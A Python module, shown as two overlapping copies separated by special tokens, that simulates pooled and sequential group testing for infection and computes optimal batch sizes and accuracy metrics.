func = lambda batch_size: 1 / batch_size + 1 - typeII_error - (1 -
typeII_error - typeI_error) * (1 - prevalence_rate) ** batch_size
if func(floor) < func(ceil):
temp = int(floor)
else:
temp = int(ceil)
if temp <= batch_limit:
return temp
else:
return int(batch_limit)
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
A function gives a list of sujects on the negative batch(es),
a list of subjects on the postive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
pos_batch (Numpy Array): an array of subjects on the postive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return np.array([]), np.array([]), p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
is the condition, where 1 stands for infection and 0 stands for uninfection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
a helper function provides convenient results for a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred, consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':
recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score
(data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],
pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),
'test_consum': consum, 'ind_consum': ind_con, 'batch_consum':
consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred, consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:, 1] == data[i][:, 1])
sens[i] = recall_score(data[i][:, 1], pred[:, 1])
spec[i] = specificity_score(data[i][:, 1], pred[:, 1])
ppv[i] = precision_score(data[i][:, 1], pred[:, 1])
npv[i] = npv_score(data[i][:, 1], pred[:, 1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum - ind_con
result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':
npv, 'test_consum': test_consum, 'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
def matrix_test(subject_array, side_length, typeII_error, typeI_error,
sq_repeat=1, ind_repeat=1, seq=True):
"""
This function provides the matrix testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
side_length (int): the side length of the matrix testing
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
sq_repeat (int): the number of parallel testing for the column/row batch testing
ind_repeat (int): the number of potential individual testing for the positive crossings
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
matrix_test_num = len(subject_array) // side_length ** 2
matrix_test_array = subject_array[0:matrix_test_num * side_length ** 2, :]
ind_test_array = subject_array[matrix_test_num * side_length ** 2:, :]
ind_idx = []
for temp_batch in np.array_split(matrix_test_array, matrix_test_num):
temp_batch = temp_batch.reshape(side_length, side_length, 2)
temp_row = []
temp_col = []
random_num_row = np.random.uniform(0, 1, sq_repeat)
random_num_col = np.random.uniform(0, 1, sq_repeat)
for i in range(side_length):
if 1 in temp_batch[i, :, 1]:
if max(random_num_row) > typeII_error:
temp_row.append(temp_batch[i, :, 0])
elif min(random_num_row) < typeI_error:
temp_row.append(temp_batch[i, :, 0])
if 1 in temp_batch[:, i, 1]:
if max(random_num_col) > typeII_error:
temp_col.append(temp_batch[:, i, 0])
elif min(random_num_col) < typeI_error:
temp_col.append(temp_batch[:, i, 0])
ind_idx.append(np.intersect1d(temp_row, temp_col))
ind_idx = np.concatenate(ind_idx)
ind_idx = ind_idx.astype('int')
if len(ind_idx) == 0:
neg_array = matrix_test_array
else:
mask = np.zeros(subject_array.shape[0], dtype=bool)
mask[ind_idx] = True
mask[matrix_test_num * side_length ** 2:] = True
ind_test_array = subject_array[mask, :]
neg_array = subject_array[~mask, :]
neg_array[:, 1] = 0
ind_test, ind_con = conventional_test(ind_test_array, typeII_error,
typeI_error, repeat=ind_repeat, seq=seq)
batch_test_num = matrix_test_num * 2 * side_length * sq_repeat
result = np.concatenate((neg_array, ind_test))
result = result[result[:, 0].argsort()]
return result, batch_test_num + ind_con, ind_con
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import precision_score, recall_score, f1_score
from scipy.optimize import fsolve
import numba
from numba import njit,jit
#
@jit(parallel = True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat = 1,
seq = True):
"""
A function gives the test results to a subject array given the probability of
type II error, the probability of Type I error, and the number of repeatition,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
# Sequential Testing
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i,1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result, consum
# Simultanous Testing
else:
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat/2 else 0
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result, len(subject_array)*repeat
@njit(parallel = True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i,:]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i,:]) < typeI_error else 0
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result,len(subject_array)*num,len(subject_array)*num
def infection_rate_on_negative_batch(p,batch_size,typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1-p
r = typeII_error * (1 - q ** batch_size)/((1 - typeI_error) * q ** batch_size + typeII_error *(1 - q**batch_size))
return p*r/(1-q**batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1-p
r = (1 - typeII_error) * (1 - q ** batch_size)/(typeI_error * q ** batch_size + (1 - typeII_error) * (1 - q **batch_size))
return p*r/(1 - q** batch_size)
def one_batch_test_solver(prevalence_rate,typeII_error, typeI_error,n_initial_guess = 2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1- prevalence_rate # To consistent with the notation of our document
func = lambda n : n*q**(n/2) - (-(1-typeII_error - typeI_error)*np.log(q))**(-1/2)
# print(func(n_initial_guess))
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
def one_batch_test_int_solver(prevalence_rate,typeII_error, typeI_error,batch_limit,n_initial_guess = 2):
"""
A function gives (int) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
n_initial_guess(float): the initial guess
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess:
batch_limit (int): the upper limit of batch size
Output:
(int): the optimal batch size
"""
sol_float = one_batch_test_solver(prevalence_rate,typeII_error, typeI_error, n_initial_guess)
floor, ceil = np.floor(sol_float), np.ceil(sol_float)
func = lambda batch_size: 1/batch_size + 1 - typeII_error -(1 - typeII_error - typeI_error)*(1-prevalence_rate)**batch_size
if func(floor) < func(ceil):
temp = int(floor)
else:
temp = int(ceil)
if temp <= batch_limit:
return temp
else:
return int(batch_limit)
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
A function gives a list of sujects on the negative batch(es),
a list of subjects on the postive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
pos_batch (Numpy Array): an array of subjects on the postive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array)/batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in (temp_batch[:,1]):
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
else:
if random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
return (neg_batch, pos_batch, test_consum)
def helpfunction(subject_array, p, batch_size ,typeII_error, typeI_error, batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
temp1 (Numpy Array): an array of subjects on the postive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error)
n0= one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
if subject_array == np.array([]):
return (np.array([]), np.array([]), p0, p1, n0, n1)
temp0, temp1, temp_con = neg_pos_batch_split(subject_array,batch_size,typeII_error, typeI_error)
return(temp0, temp1, temp_con, p0, p1, n0, n1)
def seq_test(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1,
prob_threshold = 1, seq = True, batch_limit = 32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = [] #renamed to negativeInfoList
pos_list = [] #renamed to positiveInfoList
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = [] #renamed to negativeBatches
pos_array = [] #renamed to positiveBatches
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
typeII_error, typeI_error,
batch_limit = batch_limit)
temp0 = {'data': temp0,
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': n0}
temp1 = {'data': temp1,
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:,1] = 0
individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, consum, individual_con)
def npv_score(y_true, y_pred):
"""
A function provides npv given the prediction and the truth
"""
tn, _, fn, _ = confusion_matrix(y_true = y_true,
y_pred = y_pred).ravel()
return tn/(tn + fn)
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true = y_true,
y_pred = y_pred).ravel()
return tn/(tn + fp)
@jit(parallel = True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
is the condition, where 1 stands for infection and 0 stands for uninfection
"""
#print(np.random.get_state()[1][0])
random_table = np.random.binomial(size = size, p = p, n = 1)
test_array = np.zeros((size, 2), dtype = int)
for i in range(size):
test_array[i,0] = i
test_array[i,1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
a helper function provides convenient results for a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred,consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:,1] == data[:,1]),
'sens': recall_score(data[:,1], pred[:,1]),
'spec': specificity_score(data[:,1], pred[:,1]),
'PPV': precision_score(data[:, 1], pred[:,1]),
'NPV': npv_score(data[:, 1], pred[:,1]),
'test_consum': consum,
'ind_consum': ind_con,
'batch_consum': consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred,consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:,1] == data[i][:,1])
sens[i] = recall_score(data[i][:,1], pred[:,1])
spec[i] = specificity_score(data[i][:,1], pred[:,1])
ppv[i] = precision_score(data[i][:,1], pred[:,1])
npv[i] = npv_score(data[i][:,1], pred[:,1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum-ind_con
result = {'acc': acc,
'sens': sens,
'spec': spec,
'PPV': ppv,
'NPV': npv,
'test_consum': test_consum,
'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
def matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):
"""
This function provides the matrix testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
side_length (int): the side length of the matrix testing
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
sq_repeat (int): the number of parallel testing for the column/row batch testing
ind_repeat (int): the number of potential individual testing for the positive crossings
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
matrix_test_num = len(subject_array)//(side_length**2)
matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]
ind_test_array = subject_array[matrix_test_num*side_length**2:, :]
ind_idx = []
